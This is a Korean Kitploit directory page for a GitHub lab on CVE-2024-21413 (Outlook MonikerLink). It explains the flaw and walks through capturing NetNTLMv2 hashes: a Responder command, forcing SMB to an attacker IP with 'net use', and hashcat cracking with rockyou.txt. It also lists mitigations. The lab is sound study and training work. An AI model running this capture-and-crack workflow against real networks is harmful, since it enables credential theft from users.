Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
lab-SMB-responder-CVE-2024-21413 — CVE 2024-214113(MONIKER LINK) 취약점에 대한 PenTest를 위해 만들어진 실험실. | Kitploit
도구/GitHubGitHub/sallocinavalcante/lab-smb-responder-cve-2024-21413
Password CrackingVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & EducationRed TeamingLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
sallocinavalcante/lab-smb-responder-cve-2024-21413

lab-SMB-responder-CVE-2024-21413

CVE 2024-214113(MONIKER LINK) 취약점에 대한 PenTest를 위해 만들어진 실험실.

저장소 보기
27개월 전아직 검토되지 않음

SMB + Responder 실습 (CVE-2024-21413)

🎯 목표

이 프로젝트는 CVE-2024-21413 (MonikerLink) 취약점을 연구하고, SMB/NTLM 프로토콜이 자격 증명 탈취에 어떻게 악용될 수 있는지 탐구하는 것을 목표로 했습니다. Microsoft의 공식 패치 이후에도, 이 실습은 내부 시나리오에서 개념이 여전히 유효함을 보여줍니다.


📖 익스플로잇 이론

이 취약점(CVE-2024-21413)은 MonikerLink로 알려져 있으며, 심각도가 높음(CVSS 9.8)으로 분류되었습니다. 이 취약점은 Outlook이 오래된 COM API(Moniker Objects)를 사용하여 "file://" 링크를 안전하지 않게 처리했기 때문에 발생합니다. 이러한 개체는 Outlook이 Protected View를 거치지 않고 외부 리소스를 호출할 수 있게 하여, 클라이언트가 자동으로 SMB 연결을 시작하도록 유도했습니다.

1. Moniker Link란 무엇인가?

이는 특수 링크를 통해 COM 개체를 참조할 수 있는 Windows 기능입니다.

2. Outlook이 file://을 처리하는 방식

원래 익스플로잇은 이메일로 전송된 "file://" 링크 또는 UNC 경로를 악용했습니다.

3. "!"를 사용한 우회 방법

링크에 "!" 문자를 추가하면 Outlook의 내부 보호를 우회하여 외부 리소스를 직접 열도록 강제할 수 있었습니다.

4. NTLM이 노출되는 방식

이로 인해 자동 NTLM 인증이 발생하여 사용자의 중요한 상호작용 없이 NetNTLMv2 해시가 공격자에게 노출되었습니다.

5. 패치가 수정하는 사항

패치 KB5002519는 Outlook에서 이 동작을 특별히 차단하여 "file://" 링크가 이러한 방식으로 처리되는 것을 방지합니다.

6. 패치가 수정하지 않는 사항

그러나 Windows의 자동 NTLM은 Outlook 컨텍스트 외부에서 계속 작동합니다. 즉, NTLM이 활성화되어 있고 인증 제한이 없는 환경에서 SMB 리소스에 액세스하려는 모든 시도는 여전히 자동 해시 전송을 유발할 수 있습니다.


📌 Outlook, SMB/NTLM 및 Responder 간의 관계 원래 익스플로잇: 악성 링크가 포함된 스팸 이메일 → Outlook이 처리 → NTLM이 자동으로 인증 → 공격자가 해시 수신.

내부 실습: 개념적 부분만 시뮬레이션 → 수동으로 SMB 연결 강제 → Responder가 해시 캡처 → Hashcat이 크래킹 수행.

왜 여전히 작동하는가? NTLM은 Outlook과 관계없이 SMB 연결에서 자동으로 인증하는 레거시 프로토콜이기 때문입니다. 패치는 Outlook 클라이언트를 수정하지만, Windows에서 NTLM 동작을 제거하지는 않습니다.


🏗️ 실습 아키텍처

  • 공격자: Responder 및 Hashcat이 설치된 Kali Linux.
  • 피해자: Outlook이 설치된 Windows.
  • 네트워크: 시뮬레이션된 LAN, 외부 노출 없음.
  • 도구:
    • Responder → 프로토콜 중독 및 해시 캡처용.
    • Hashcat → 캡처된 해시의 오프라인 크래킹용.

윈도우 IP
리눅스 IP


🛡️ Outlook 패치

테스트 중 Outlook은 이메일에서 온 file:// 링크를 차단하고 보안 경고를 표시했습니다.

Outlook 경고

참고 사항

2024년 2월에 출시된 패치 KB5002519는 file:// 링크를 차단하여 이메일을 통한 외부 벡터를 완화합니다. 그러나 NTLM 프로토콜은 SMB 연결에서 자동 인증을 계속 허용합니다. 이는 Outlook이 이 특정 익스플로잇으로부터 보호되지만, 내부 공격 표면은 여전히 유효함을 의미합니다. 문제의 근본 원인은 인증 메커니즘으로서 NTLM에 대한 의존성에 있으며, 이는 SMB 연결에서 해시 캡처에 여전히 취약합니다.


📊 위험 지표

  • CVE: CVE-2024-21413
  • CVSS: 9.8 (심각)
  • 영향: RCE + 자격 증명 유출
  • 벡터: 외부(Outlook) 및 내부(SMB/NTLM)
  • 권장 완화 조치:
    • KB5002519 패치 적용.
    • 가능한 경우 NTLM 비활성화.
    • AD 환경에서 Kerberos 강제 사용.
    • MFA 및 강력한 암호 구현.

📚 학습 포인트

  1. Outlook 패치는 외부 링크 클릭만 차단합니다.
  2. SMB/NTLM은 네트워크 내에서 여전히 공격 표면으로 남아 있습니다.
  3. NetNTLMv2 해시는 캡처되어 오프라인에서 크래킹될 수 있습니다.
  4. 약한 암호는 일반적인 워드리스트에서 쉽게 발견됩니다.
  5. 공식 패치가 적용되어도, 이 취약점은 내부 시나리오에서 여전히 유효합니다.

📌 단계별 가이드

  1. Responder 시작 여기서 Kali의 네트워크 인터페이스에서 Responder를 시작합니다. Responder는 가짜 SMB 서버 역할을 하여 피해자의 요청에 응답하고 NTLM 자격 증명을 캡처할 준비를 합니다. 이 단계는 프로토콜 중독 및 가로채기 환경을 준비하는 데 필수적입니다. Kali Linux 명령어:
root@kitploit:~
sudo responder -I eth0

Responder 활성화됨


  1. SMB 통신 강제
    Windows에서 공격자의 IP를 가리키는 SMB 리소스에 수동으로 액세스합니다. 이 액세스는 Windows 클라이언트가 NTLM을 통해 자동으로 인증을 시도하도록 강제하여, 해시를 가짜 서버(Responder)로 전송합니다. 이 시점에서 자격 증명이 처음으로 노출됩니다. SMB 통신을 강제하는 방법은 두 가지입니다:

Via Explorer, acessando manualmente:

root@kitploit:~
\\<IP do atacante>\test.

Explorer에서 SMB 강제

Via terminal (cmd ou PowerShell), usando o comando:

root@kitploit:~
net use \\<IP do atacante>\test

터미널에서 SMB 강제

  1. 해시 캡처
    Responder는 인증 시도를 가로채어 NTLMv2 해시를 /usr/share/responder/logs/ 안의 로그 파일에 저장합니다. 이 파일에는 크래킹에 사용될 원시 자료가 포함되어 있습니다. 여기서 취약점이 입증됩니다: 평문 암호 없이도 해시를 캡처하여 재사용할 수 있습니다.
root@kitploit:~
/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

Responder가 캡처한 해시


  1. Hashcat을 사용한 크래킹
    Hashcat을 실행하기 전에 로그에서 해시를 홈 디렉토리(~/.hash.txt) 파일로 복사합니다. 이렇게 하면 조작이 용이해지고 Hashcat이 내용에 직접 액세스할 수 있습니다. 그런 다음, rockyou.txt 워드리스트를 사용하여 Hashcat을 모드 5600(NetNTLMv2)으로 실행합니다. 이 프로세스는 해시를 오프라인에서 크래킹하여 약한 암호가 얼마나 빠르게 발견될 수 있는지 보여줍니다. 결과는 암호가 발견되었는지 여부를 보여주며, 취약점의 실제 위험을 입증합니다.
root@kitploit:~
hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt

참고:
보안상의 이유로 실제 암호는 표시되지 않습니다. 목표는 프로세스와 취약점을 시연하는 것입니다.

Hashcat 명령어 크래킹 결과

✅ 결론

이 실습은 다음을 입증했습니다:

  • Outlook을 통한 익스플로잇은 패치로 차단되었습니다.
  • 그럼에도 불구하고 SMB 해시를 수동으로 캡처하고 크래킹하는 것이 가능합니다.
  • 이 취약점은 개념적으로 여전히 유효하며, 내부 강화, 강력한 암호, Kerberos/토큰 기반 인증으로의 마이그레이션의 중요성을 강조합니다.
도구 다운로드